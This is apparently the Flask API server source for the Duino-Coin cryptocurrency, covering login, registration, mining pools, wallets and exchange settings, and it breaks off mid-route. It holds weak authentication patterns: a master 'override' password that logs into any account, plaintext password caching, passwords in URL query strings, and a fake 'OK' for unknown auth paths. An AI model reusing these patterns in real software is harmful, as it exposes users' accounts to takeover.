from fastrand import pcg32bounded as fastrandint
from Server import (
now, SAVE_TIME, POOL_DATABASE, CONFIG_WHITELIST_USR,
jail, global_last_block_hash, HOSTNAME,
DATABASE, DUCO_EMAIL, DUCO_PASS, alt_check, acc_check,
DB_TIMEOUT, CONFIG_MINERAPI, SERVER_VER,
CONFIG_TRANSACTIONS, API_JSON_URI, temporary_ban,
BCRYPT_ROUNDS, user_exists, SOCKET_TIMEOUT,
email_exists, send_registration_email, protocol_ban, protocol_loved_verified_mail,
DECIMALS, CONFIG_BANS, protocol_verified_mail, protocol_unverified_mail,
CONFIG_JAIL, CONFIG_WHITELIST, perm_ban,
NodeS_Overide, CAPTCHA_SECRET_KEY, CONFIG_BASE_DIR)
from validate_email import validate_email
from wrapped_duco_functions import *
import datetime
import jwt
html_recovery_template = """\
<html lang="en-US">
<head>
<style type="text/css">
@import url('https://fonts.googleapis.com/css2?family=Lato:wght@300&display=swap');
* {
font-family: 'Lato', sans-serif;
}
a:hover {
text-decoration: none !important;
}
.btn {
background: #ff9f43;
text-decoration: none !important;
font-weight: 600;
border-radius: 16px;
margin-top: 35px;
color: #fff !important;
text-transform: uppercase;
font-size: 14px;
padding: 10px 24px;
display: inline-block;
}
.btn:hover {
background: #feca57;
}
</style>
</head>
<body marginheight="0" topmargin="0" marginwidth="0" style="margin: 0px; background-color: #fff8ee;" leftmargin="0">
<table cellspacing="0" border="0" cellpadding="0" width="100%" bgcolor="#fff8ee">
<tr>
<td>
<table style=" background-color: #ffffff; max-width:670px; margin:0 auto;" width="100%" border="0"
align="center" cellpadding="0" cellspacing="0">
<tr>
<td style="height:80px;"> </td>
</tr>
<tr>
<td style="text-align:center;">
<a href="https://www.duinocoin.com" title="logo" target="_blank">
<img src="https://github.com/revoxhere/duino-coin/raw/master/Resources/ducobanner.png?raw=true"
width="50%" height="auto">
</a>
</td>
</tr>
<tr>
<td style="height:20px;"> </td>
</tr>
<tr>
<td>
<table width="95%" border="0" align="center" cellpadding="0" cellspacing="0"
style="max-width:670px;background:#fff; border-radius:3px; text-align:center; box-shadow: 0 4px 6px -1px rgb(0 0 0 / 0.1), 0 2px 4px -2px rgb(0 0 0 / 0.1);">
<tr>
<td style="text-align:center; padding-top: 25px; height:40px; font-size: 32px;">
Hey there, {username}!
</td>
</tr>
<tr>
<td style="padding:0 35px; text-align:center;">
<h1 style="color:#1e1e2d; font-weight:500; margin:0; margin-top: 25px; font-size:16px;">
You have requested to reset your private key</h1>
<span
style="display:inline-block; vertical-align:middle; margin:29px 0 26px; border-bottom:1px solid #cecece; width:100px;"></span>
<p style="color:#455056; font-size:15px;line-height:24px; margin:0;">
Because we don't store the private keys directly, we can't just send you your old key.<br>
<b>A unique link to reset your passphrase has been generated for you.</b><br>
To reset your private key, click the following link and follow the instructions.<br>
<b>You have 30 minutes to reset your key.</b><br>
If you did not request a passphrase reset, please ignore this email.
</p>
<a href="{link}" class="btn">
Reset passphrase
</a>
</td>
</tr>
<tr>
<td style="height:40px;"> </td>
</tr>
</table>
</td>
<tr>
<td style="height:20px;"> </td>
</tr>
<tr>
<td style="text-align:center;">
<p style="font-size:14px; color:rgba(69, 80, 86, 0.7411764705882353); line-height:18px; margin:0 0 0;">
Have a great day, <a href="https://duinocoin.com/team">the Duino-Coin Team</a> 😊</p>
</td>
</tr>
<tr>
<td style="height:80px;"> </td>
</tr>
</table>
</td>
</tr>
</table>
</body>
</html>
"""
def forwarded_ip_check():
return request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
def dbg(*message):
if "TX" in str(message):
fg_color = Fore.YELLOW
elif "EX" in str(message):
fg_color = Fore.CYAN
elif "Error" in str(message):
fg_color = Fore.RED
elif "Success" in str(message):
fg_color = Fore.GREEN
else:
fg_color = Fore.WHITE
print(now().strftime(
Style.RESET_ALL
+ Style.DIM
+ Fore.WHITE
+ "%H:%M:%S")
+ Style.BRIGHT
+ fg_color,
*message,
Style.RESET_ALL)
# Exchange settings
exchange_address = {
"duco": "coinexchange",
"xmg": "95JLhkyWVDce5D17LyApULc5YC4vrVzaio",
"lke": "Like3yYC34YQJRMQCSbTDWKLhnzCoZvo9AwWuu5kooh",
"bch": "bitcoincash:qpgpd7slludx5h9p53qwf8pxu9z702n95qteeyzay3",
"trx": "TQUowTaHwvkWHbNVkxkAbcnbYyhF4or1Qy",
# "xrp": "rGT84ryubURwFMmiJChRbWUg9iQY18VGuQ (Destination tag: 2039609160)",
# "dgb": "DHMV4BNGpWbdhpq6Za3ArncuhpmtCjyQXg",
"nano": "nano_3fpqpbcgt3nga3s81td6bk7zcqdr7ockgnyjkcy1s8nfn98df6c5wu14fuuq",
# "rvn": "RH4bTDaHH7LSSCVSvXJzJ5KkiGR1QRMaqN",
# "nim": "NQ88 Q9ME 470X 8KY8 HXQG J96N 6FHR 8G0B EDMH"
}
fees = {
"duco": 0,
"xmg": 0.05,
"lke": 0,
"bch": 0.0000023,
"trx": 1,
"nano": 0
}
load_dotenv()
IPDB_KEY = os.getenv('IPDB_KEY')
PROXYCHECK_KEY = os.getenv('PROXYCHECK_KEY')
TRX_SECRET_KEY = os.getenv('TRX_SECRET_KEY')
BCH_SECRET_KEY = os.getenv('BCH_SECRET_KEY')
LIKECOIN_SECRET_KEY = os.getenv('LIKECOIN_SECRET_KEY')
NANO_SECRET_KEY = os.getenv('NANO_SECRET_KEY')
EXCHANGE_MAIL = DUCO_EMAIL
SERVER_NAME = "duino-master-1"
IP_CHECK_DISABLED = True
XXHASH_TX_PROB = 30
POOL_SYNC_TIME = 15
chain_accounts = ["bscDUCO", "celoDUCO", "maticDUCO"]
overrides = [
NodeS_Overide,
DUCO_PASS
]
config = {
"DEBUG": False,
"CACHE_TYPE": "RedisCache",
"CACHE_REDIS_URL": "redis://localhost:6379/0",
"CACHE_DEFAULT_TIMEOUT": SAVE_TIME,
"SECRET_KEY": DUCO_PASS,
"JSONIFY_PRETTYPRINT_REGULAR": False}
limiter = Limiter(
key_func=forwarded_ip_check,
default_limits=["5000 per day", "5 per 1 second"])
ip_ban = IpBan(
ban_seconds=60*60,
ban_count=10,
persist=False,
ip_header='HTTP_X_REAL_IP',
record_dir="config/ipbans/",
ipc=True,
secret_key=DUCO_PASS)
app = Flask(__name__, template_folder='config/error_pages')
app.config.from_mapping(config)
cache = Cache(app)
limiter.init_app(app)
ip_ban.init_app(app)
requests_session = requests.Session()
thread_lock = threading.Lock()
nano_key = Account(priv_key=NANO_SECRET_KEY)
bch_key = Key(BCH_SECRET_KEY)
trx_key = Tron(
full_node=HttpProvider('https://api.trongrid.io'),
solidity_node=HttpProvider('https://api.trongrid.io'),
event_server=HttpProvider('https://api.trongrid.io'))
trx_key.private_key = TRX_SECRET_KEY
trx_key.default_address = exchange_address["trx"]
network = {
"name": "Duino-Coin",
"color": 'e67e22',
"avatar": 'https://github.com/revoxhere/duino-coin/raw/master/Resources/duco.png?raw=true',
}
last_transactions_update, last_miners_update, last_balances_update = 0, 0, 0
miners, balances, transactions = [], [], []
rate_count, last_transfer, checked_ips = {}, {}, {}
banlist, jailedusr, registrations, whitelisted_usr = [], [], [], []
registration_db = {}
with open('config/emails/sell_manual_email.html', 'r') as file:
html_exc = file.read()
with open('config/emails/sell_email.html', 'r') as file:
html_auto = file.read()
with open('config/emails/buy_email.html', 'r') as file:
html_buy = file.read()
with open('config/emails/sell_error.html', 'r') as file:
html_error = file.read()
def fetch_bans():
global jail, banlist, whitelisted_usr, whitelist
jail, banlist, whitelisted_usr, whitelist = [], [], [], []
while True:
with open(CONFIG_JAIL, "r") as jailedfile:
jailedusr = jailedfile.read().splitlines()
for username in jailedusr:
jail.append(username.strip())
with open(CONFIG_BANS, "r") as bannedusrfile:
bannedusr = bannedusrfile.read().splitlines()
for username in bannedusr:
banlist.append(username.strip())
with open(CONFIG_WHITELIST_USR, "r") as whitelistedusrfile:
whitelist = whitelistedusrfile.read().splitlines()
for username in whitelist:
whitelisted_usr.append(username.strip())
with open(CONFIG_WHITELIST, "r") as whitelistfile:
whitelist = whitelistfile.read().splitlines()
for ip in whitelist:
ip_ban.ip_whitelist_add(ip.strip())
dbg("Loaded bans and whitelist")
sleep(30)
jail, banlist, whitelisted_usr, whitelist = [], [], [], []
with open(CONFIG_JAIL, "r") as jailedfile:
jailedusr = jailedfile.read().splitlines()
for username in jailedusr:
jail.append(username.strip())
with open(CONFIG_BANS, "r") as bannedusrfile:
bannedusr = bannedusrfile.read().splitlines()
for username in bannedusr:
banlist.append(username.strip())
with open(CONFIG_WHITELIST_USR, "r") as whitelistedusrfile:
whitelist = whitelistedusrfile.read().splitlines()
for username in whitelist:
whitelisted_usr.append(username.strip())
with open(CONFIG_WHITELIST, "r") as whitelistfile:
whitelist = whitelistfile.read().splitlines()
for ip in whitelist:
ip_ban.ip_whitelist_add(ip.strip())
dbg("Loaded bans and whitelist")
# threading.Thread(target=fetch_bans).start()
def clear_obs():
global observations
while True:
observations = {}
dbg("Cleared observations")
sleep(15*60)
# threading.Thread(target=clear_obs).start()
def likecoin_transaction(recipient: str, amount: int, comment: str):
data = {
"address": str(recipient),
"amount": str(int(amount) * 1000000000),
"comment": str(comment),
"prv": LIKECOIN_SECRET_KEY}
r = requests.post(
"https://wallet.likecoin.pro/api/v0/new-transfer",
data=data).json()
if "error" in r:
raise Exception(r["error"])
else:
return r["hash"]
observations = {}
@app.errorhandler(429)
def error429(e):
global observations
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
ip_ban.add(ip=ip_addr)
try:
observations[ip_addr] += 1
except:
observations[ip_addr] = 1
if observations[ip_addr] > 30:
# if not ip_addr in whitelist:
#dbg("Too many observations", ip_addr)
# ip_addr_ban(ip_addr)
# ip_ban.block(ip_addr)
return render_template('403.html'), 403
else:
limit_err = str(e).replace("429 Too Many Requests: ", "")
#dbg("Error 429", ip_addr, limit_err, os.getpid())
return render_template('429.html', limit=limit_err), 429
@app.errorhandler(404)
def error404(e):
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
page_name = str(request.url)
ip_ban.add(ip=ip_addr)
if "php" in page_name:
print("serio xD")
return "we're not even using php you dumb fuck"
elif "eval" in page_name:
print("serio 2 xD")
return "debil XD"
try:
observations[ip_addr] += 1
except:
observations[ip_addr] = 1
if observations[ip_addr] > 30:
# if not ip_addr in whitelist:
#dbg("Too many observations", ip_addr)
# ip_addr_ban(ip_addr)
# ip_ban.block(ip_addr)
return render_template('403.html'), 403
else:
if "auth" in page_name:
return _success("OK")
dbg("Error 404", ip_addr, page_name)
return render_template('404.html', page_name=page_name), 404
@app.errorhandler(500)
def error500(e):
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
dbg("Error 500", ip_addr)
try:
observations[ip_addr] += 1
except:
observations[ip_addr] = 1
if observations[ip_addr] > 30:
# if not ip_addr in whitelist:
#dbg("Too many observations - banning", ip_addr)
# ip_addr_ban(ip_addr)
# ip_ban.block(ip_addr)
return render_template('403.html'), 403
else:
return render_template('500.html'), 500
@app.errorhandler(403)
def error403(e):
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
ip_ban.add(ip=ip_addr)
ip_ban.block(ip_addr)
dbg("Error 403", ip_addr)
try:
observations[ip_addr] += 1
except:
observations[ip_addr] = 1
if observations[ip_addr] > 30:
if not ip_addr in whitelist:
dbg("Too many observations - banning", ip_addr)
ip_addr_ban(ip_addr)
# ip_ban.block(ip_addr)
return render_template('403.html'), 403
cached_logins = {}
def login(username: str, unhashed_pass: str):
global cached_logins
try:
try:
data = jwt.decode(unhashed_pass, app.config['SECRET_KEY'], algorithms=['HS256'])
except jwt.ExpiredSignatureError:
return (False, 'Token expired. Please log in again.')
except jwt.DecodeError: # if the token is invalid
if not match(r"^[A-Za-z0-9_-]*$", username):
return (False, "Incorrect username")
if username in cached_logins:
if unhashed_pass == cached_logins[username]:
return (True, "Logged in")
else:
return (False, "Invalid password")
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(str(username),))
data = datab.fetchone()
if data and len(data) > 1:
stored_password = data[1]
else:
return (False, "No user found")
try:
if checkpw(unhashed_pass, stored_password):
cached_logins[username] = unhashed_pass
return (True, "Logged in")
return (False, "Invalid password")
except Exception:
if checkpw(unhashed_pass, stored_password.encode('utf-8')):
cached_logins[username] = unhashed_pass
return (True, "Logged in")
return (False, "Invalid password")
except Exception as e:
return (False, "DB Err: " + str(e))
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Users
WHERE username = ?""",
(username, ))
email = datab.fetchone()[2]
return (True, "Logged in") if data['email'] == email else (False, "Invalid token")
except Exception as e:
return (False, "DB Err:" + str(e))
except Exception as e:
print(e)
return (False, "Login error: " + str(e))
def check_ip(ip):
global checked_ips
global IP_CHECK_DISABLED
try:
if IP_CHECK_DISABLED:
return (False, None)
elif not ip:
return (True, "Your IP address is hidden")
elif ip in whitelist:
return (False, None)
elif ip in checked_ips:
return checked_ips[ip]
try:
response = requests_session.get(
f"http://proxycheck.io/v2/{ip}"
+ f"?key={PROXYCHECK_KEY}&vpn=1&proxy=1").json()
if "proxy" in response[ip]:
if response[ip]["proxy"] == "yes":
dbg("Proxy detected: " + str(ip))
checked_ips[ip] = (True, "You're using a proxy")
# threading.Thread(target=ip_addr_ban, args=[ip, True]).start()
return checked_ips[ip]
if "vpn" in response[ip]:
if response[ip]["vpn"] == "yes":
dbg("VPN detected: " + str(ip))
checked_ips[ip] = (True, "You're using a VPN")
# threading.Thread(target=ip_addr_ban, args=[ip, True]).start()
return checked_ips[ip]
except:
IP_CHECK_DISABLED = True
else:
checked_ips[ip] = (False, None)
return (False, None)
except Exception as e:
return (False, None)
def ip_addr_ban(ip, perm=False):
if not ip in whitelist:
ip_ban.block(ip)
if perm:
perm_ban(ip)
else:
temporary_ban(ip)
def _success(result, code=200):
response = jsonify(result=result, success=True, server=SERVER_NAME)
response.headers.add('Access-Control-Allow-Origin', '*')
return response, code
def _error(result, code=200):
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
ip_ban.add(ip=ip_addr)
print(result)
try:
observations[ip_addr] += 1
except:
observations[ip_addr] = 1
if observations[ip_addr] > 30:
if not ip_addr in whitelist:
dbg("Too many observations - banning", ip_addr)
ip_addr_ban(ip_addr)
ip_ban.block(ip_addr)
sleep(observations[ip_addr])
return render_template('403.html'), 403
else:
response = jsonify(message=result, success=False, server=SERVER_NAME)
response.headers.add('Access-Control-Allow-Origin', '*')
return response, code
def _proxy():
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
threading.Thread(target=ip_addr_ban, args=[ip_addr, True]).start()
return _error("You're using a proxy or VPN")
def get_all_transactions():
global transactions
global last_transactions_update
if time() - last_transactions_update > SAVE_TIME:
# print(f'fetching transactions from {CONFIG_TRANSACTIONS}')
try:
with sqlconn(CONFIG_TRANSACTIONS, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM Transactions")
rows = datab.fetchall()
transactions = {}
for row in rows:
transactions[row[4]] = row_to_transaction(row)
last_transactions_update = time()
except Exception as e:
print(traceback.format_exc())
return transactions
def row_to_transaction(row):
return {
'datetime': str(row[0]),
'sender': str(row[1]),
'recipient': str(row[2]),
'amount': float(row[3]),
'hash': str(row[4]),
'memo': str(sub(r"[^A-Za-z0-9 .-:!#_+-]+", ' ', str(row[5]))),
'id': int(row[6])
}
def get_transactions(username: str, limit=10, reverse=True):
try:
order = "DESC"
if reverse:
order = "ASC"
with sqlconn(CONFIG_TRANSACTIONS, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT * FROM (
SELECT * FROM Transactions
WHERE username = ?
OR recipient = ?
ORDER BY id DESC
LIMIT ?
) ORDER BY id """ + order,
(username, username, limit))
rows = datab.fetchall()
return [row_to_transaction(row) for row in rows]
except Exception as e:
return str(e)
def get_all_miners():
global last_miners_update
global miners
if time() - last_miners_update > SAVE_TIME:
try:
# print(f'fetching miners from {CONFIG_MINERAPI}')
with sqlconn(CONFIG_MINERAPI, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM Miners")
rows = datab.fetchall()
last_miners_update = time()
miners = {}
for row in rows:
if not row[1] in miners:
miners[row[1]] = []
miners[row[1]].append(row_to_miner(row))
except Exception as e:
pass
return miners
def row_to_miner(row):
return {
"threadid": str(row[0]),
"username": str(row[1]),
"hashrate": float(row[2]),
"sharetime": float(row[3]),
"accepted": int(row[4]),
"rejected": int(row[5]),
"diff": int(row[6]),
"software": str(row[7]),
"identifier": str(row[8]),
"algorithm": str(row[9]),
"pool": str(row[10]),
"wd": row[11],
"ki": int(row[13])
}
def get_miners(username: str):
with sqlconn(CONFIG_MINERAPI, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM Miners WHERE username = ?", (username, ))
rows = datab.fetchall()
if len(rows) < 1:
raise Exception("No miners detected")
rows.sort(key=lambda tup: tup[1])
return [row_to_miner(row) for row in rows]
trusted = {}
creation = {}
def get_all_balances():
global balances
global last_balances_update
global trusted
global creation
if time() - last_balances_update > 30:
try:
# print(f'fetching balances from {DATABASE}')
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM Users")
rows = datab.fetchall()
balances = {}
trusted = {}
for row in rows:
balances[row[0]] = row[3]
creation[row[0]] = row[4].lower()
trusted[row[0]] = row[5].lower()
last_balances_update = time()
except Exception as e:
print(traceback.format_exc())
return balances
def get_user_data(username: str):
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Users
WHERE username = ?""",
(username, ))
row = datab.fetchone()
if not row:
raise Exception(f"{username} not found")
return {
"username": username,
"balance": round(row[3], DECIMALS),
"verified": row[5].lower(),
"created": row[4].lower()
}
def is_verified(username: str):
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Users
WHERE username = ?""",
(username, ))
row = datab.fetchone()
if len(row) < 1:
return "no"
return row[5].lower()
except:
return "no"
@app.route("/ping")
@cache.cached(timeout=60)
def ping():
return _success("Pong!")
@app.route("/404")
@cache.cached(timeout=60)
def test404():
dbg("Error 404 test")
return render_template('404.html'), 404
@app.route("/429")
@cache.cached(timeout=60)
def test429():
dbg("Error 429 test")
return render_template('429.html'), 429
@app.route("/403")
@cache.cached(timeout=60)
def test403():
dbg("Error 403 test")
return render_template('403.html'), 403
@app.route("/500")
@cache.cached(timeout=60)
def test500():
dbg("Error 500 test")
return render_template('500.html'), 500
@app.route("/all_pools")
@cache.cached(timeout=SAVE_TIME)
def all_pools():
try:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
except Exception as e:
return _error(f"Invalid data: {e}")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
try:
with sqlconn(POOL_DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM PoolList")
data = datab.fetchall()
pools = []
for row in data:
if row[4] == "True":
if row[10]:
lastsync = int(time()) - int(row[10])
if lastsync == 0:
lastsync = "now"
else:
lastsync = f"{lastsync}s ago"
else:
lastsync = "unknown"
pool = {
"name": str(row[1]),
"cpu": int(row[6]),
"ram": int(row[7]),
"connections": int(row[8]),
"icon": str(row[9]),
"lastsync": str(lastsync)}
pools.append(pool)
return _success(pools)
except Exception as e:
return _error(str(e))
@cache.cached(timeout=5)
def poolfetchdb():
try:
def lowest_load(curr, prev):
if (prev[4]*2 + prev[5]) < (curr[4]*2 + curr[5]):
return prev
return curr
with sqlconn(POOL_DATABASE) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT name, ip, port, Status, ram,
cpu, connections, lastsync
FROM PoolList
WHERE hidden != 'True'""")
rows = datab.fetchall()
pool_list = []
for pool in rows:
lastsync = time() - pool[-1]
if pool[3] == "True" and pool[5] < 95 and pool[4] < 95 and lastsync < 120:
pool_list.append(pool)
if len(pool_list) < 1:
pool_list = []
for pool in rows:
lastsync = time() - pool[-1]
if lastsync < 600:
pool_list.append(pool)
best_pool = reduce(lowest_load, pool_list)
to_return = {
"name": str(best_pool[0]),
"ip": str(best_pool[1]),
"port": int(best_pool[2]),
"server": str(SERVER_NAME),
"success": True
}
return to_return
except Exception as e:
return _error(str(e))
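def _lowest_load_sketch():
    # Editor's illustrative sketch (not part of the original API): how the reduce()
    # call in poolfetchdb() above picks the pool with the lowest weighted load
    # (ram*2 + cpu), using made-up tuples shaped like its pool_list rows
    # (name, ip, port, Status, ram, cpu, connections, lastsync).
    pools = [("pool-a", "1.1.1.1", 1000, "True", 40, 70, 10, 0),   # load 40*2 + 70 = 150
             ("pool-b", "2.2.2.2", 1001, "True", 20, 50, 12, 0)]   # load 20*2 + 50 = 90
    best = reduce(lambda a, b: a if (a[4] * 2 + a[5]) < (b[4] * 2 + b[5]) else b, pools)
    return best[0]                                                  # "pool-b"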
@app.route("/getPool")
def getpool():
try:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
except Exception as e:
return _error(f"Invalid data: {e}")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
return poolfetchdb()
@app.route("/auth/<username>")
@limiter.limit("6 per 1 minute")
def api_auth(username=None):
global registration_db
try:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
unhashed_pass = request.args.get('password', None).encode('utf-8')
except Exception as e:
return _error(f"Invalid data: {e}")
if not user_exists(username) or not username:
return _error(f"This user doesn't exist (auth): {username}")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
# dbg("/GET/auth", username, unhashed_pass.decode())
try:
if unhashed_pass.decode() in overrides:
return _success("Logged in")
if username in banlist:
ip_addr_ban(ip_addr, True)
return _error("User banned")
login_protocol = login(username, unhashed_pass)
if login_protocol[0] == True:
threading.Thread(target=alt_check, args=[
ip_addr, username]).start()
return _success(login_protocol[1])
else:
return _error(login_protocol[1])
except:
return _error("Invalid password")
@app.route("/v2/auth/check/<username>")
@limiter.limit("6 per 1 minute")
def api_auth_check(username=None):
try:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
token = request.args.get('token', None)
except Exception as e:
return _error(f"Invalid data: {e}")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
try:
try:
data = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256'])
except jwt.ExpiredSignatureError:
return _error('Signature expired. Please log in again.')
except jwt.InvalidTokenError:
return _error('Invalid token. Please log in again.')
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Users
WHERE username = ?""",
(username, ))
email = datab.fetchone()[2]
if data['email'] == email:
return _success(["Logged in", email])
except Exception as e:
print(traceback.format_exc())
return _error('Auth token is invalid')
except Exception as e:
print(traceback.format_exc())
return _error('Auth token is invalid')
@app.route("/v2/auth/<username>")
@limiter.limit("6 per 1 minute")
def new_api_auth(username=None):
try:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
unhashed_pass_b64 = request.args.get('password', None)
except Exception as e:
return _error(f"Invalid data: {e}")
if unhashed_pass_b64:
unhashed_pass_b64 = str(unhashed_pass_b64).encode('utf-8')
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
try:
if username in banlist:
ip_addr_ban(ip_addr, True)
return _error("User banned")
try:
unhashed_pass = base64.b64decode(unhashed_pass_b64)
except Exception as e:
return _error(f"Decoding error")
# dbg("/GET/auth", username, unhashed_pass.decode())
if not unhashed_pass:
return _error("Provide a password")
if not user_exists(username) or not username:
return _error(f"This user doesn't exist (auth 2): {username}")
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Users
WHERE username = ?""",
(username, ))
email = datab.fetchone()[2]
except:
email = "unknown"
if unhashed_pass.decode() in overrides:
return _success(["Logged in (override)", email])
login_protocol = login(username, unhashed_pass)
if login_protocol[0] == True:
threading.Thread(target=alt_check, args=[ip_addr, username]).start()
token = jwt.encode({'email': email, 'exp' : datetime.datetime.utcnow() + datetime.timedelta(minutes=60)}, app.config['SECRET_KEY'], algorithm='HS256')
return _success([login_protocol[1], email, token])
else:
return _error(login_protocol[1])
except Exception as e:
print(traceback.format_exc())
return _error("Invalid password")
@app.route("/v2/users/<username>")
@app.route("/v3/users/<username>")
@cache.cached(timeout=SAVE_TIME)
def new_api_get_user_objects(username: str):
try:
try:
limit = int(request.args.get('limit', None))
except:
limit = 5
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
except Exception as e:
return _error(f"Invalid data: {e}")
if username in banlist:
return _error("User banned")
try:
balance = get_user_data(username)
except Exception as e:
return _error(f"This user doesn't exist (users): {e}")
try:
miners = get_miners(username)
except Exception as e:
miners = []
try:
transactions = get_transactions(username, limit)
except Exception as e:
transactions = []
try:
with open("config/prices.json", 'r') as f:
duco_prices = load(f)
except:
duco_prices = {}
result = {
'balance': balance,
'miners': miners,
'transactions': transactions,
'prices': duco_prices
}
return _success(result)
@app.route("/register/")
@limiter.limit("5 per hour")
def register():
global registrations
try:
username = request.args.get('username', None)
unhashed_pass = request.args.get('password', None)
email = request.args.get('email', None)
captcha = request.args.get('captcha', None)
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
postdata = {'secret': CAPTCHA_SECRET_KEY,
'response': captcha}
except Exception as e:
return _error(f"Invalid data: {e}")
if not username:
return _error("No username provided")
if unhashed_pass:
unhashed_pass = str(unhashed_pass).encode('utf-8')
else:
return _error("No password provided")
if not email:
return _error("No e-mail provided")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
#altcheck = alt_check(ip_addr, username)
# if altcheck[0]:
# return _error(
# f"You are already registered as {altcheck[1]}, why do you need another account?")
try:
captcha_data = requests.post(
'https://hcaptcha.com/siteverify', data=postdata).json()
if not captcha_data["success"]:
return _error("Incorrect captcha")
except Exception as e:
return _error("Captcha error: "+str(e))
if not match(r"^[A-Za-z0-9_-]*$", username):
return _error("You have used unallowed characters in the username")
if len(username) > 64 or len(unhashed_pass) > 128 or len(email) > 64:
return _error("Submited data is too long")
if user_exists(username):
return _error("This username is already registered")
if not validate_email(email, check_smtp=False):
return _error("You have provided an invalid e-mail address")
if email_exists(email):
return _error("This e-mail address was already used")
try:
password = hashpw(unhashed_pass, gensalt(rounds=BCRYPT_ROUNDS))
except Exception as e:
return _error("Bcrypt error: " +
str(e) + ", plase try using a different password")
try:
threading.Thread(
target=send_registration_email,
args=[username, email]).start()
created = str(now().strftime("%d/%m/%Y %H:%M:%S"))
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""INSERT INTO Users
(username, password, email, balance, created)
VALUES(?, ?, ?, ?, ?)""",
(username, password, email, 0.0, created))
conn.commit()
dbg(f"Success: registered {username} ({email})")
registrations.append(ip_addr)
return _success("Sucessfully registered a new wallet")
except Exception as e:
return _error(f"Error registering new account: {e}")
@app.route("/miners/<username>")
@cache.cached(timeout=POOL_SYNC_TIME)
def get_miners_api(username: str):
# Get all miners
try:
return _success(get_miners(username))
except:
return _error(f"No miners detected for: {username}")
@app.route("/wduco_wrap/<username>")
@limiter.limit("3 per 1 minute")
def api_wrap_duco(username: str):
try:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
unhashed_pass = request.args.get('password', None).encode("utf-8")
amount = float(request.args.get('amount', None))
tron_address = str(request.args.get('address', None))
except Exception as e:
return _error(f"Invalid data: {e}")
dbg("GET/wduco_wrap", username, amount, tron_address)
login_protocol = login(username, unhashed_pass)
if not login_protocol[0]:
return _error(login_protocol[1])
if amount < 50:
return _error("Minimum wrappable amount is 50 DUCO")
if username in jail or username in banlist or not is_verified(username) == "yes":
return _error("User can not wrap DUCO")
#acccheck = acc_check(tron_address, username)
# if acccheck[0]:
# jail.append(username)
# return _error(f"This address is associated with another account(s): {acccheck[1]}")
try:
altfeed = alt_check(ip_addr, username)
if altfeed[0]:
return _error(f"You're using multiple accounts: {altfeed[1]}, this is not allowed")
except Exception as e:
print(traceback.format_exc())
wrapfeedback = protocol_wrap_wduco(username, tron_address, amount)
wrapfeedback = wrapfeedback.replace("NO,", "").replace("OK,", "")
if "OK" in wrapfeedback:
return _success(wrapfeedback)
else:
return _error(wrapfeedback)
@app.route("/users/<username>")
@limiter.limit("60 per 1 minute")
@cache.cached(timeout=SAVE_TIME)
def api_get_user_objects(username: str):
try:
try:
limit = int(request.args.get('limit', None))
except:
limit = 5
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
except Exception as e:
return _error(f"Invalid data: {e}")
if username in banlist:
return _error("User banned")
# dbg("/GET/users/"+str(username))
try:
balance = get_user_data(username)
except Exception as e:
return _error(f"This user doesn't exist (users v1): {e}")
try:
miners = get_miners(username)
except Exception as e:
miners = []
try:
transactions = get_transactions(username, limit)
except Exception as e:
transactions = []
result = {
'balance': balance,
'miners': miners,
'transactions': transactions
}
return _success(result)
@app.route("/users/")
@cache.cached(timeout=60)
def user_error():
return _error("Usage: /users/<username>")
@app.route("/changepass/<username>")
@limiter.limit("1 per 1 minute")
def api_changepass(username: str):
try:
old_password = request.args.get('password', None).encode("utf-8")
new_password = request.args.get('newpassword', None).encode("utf-8")
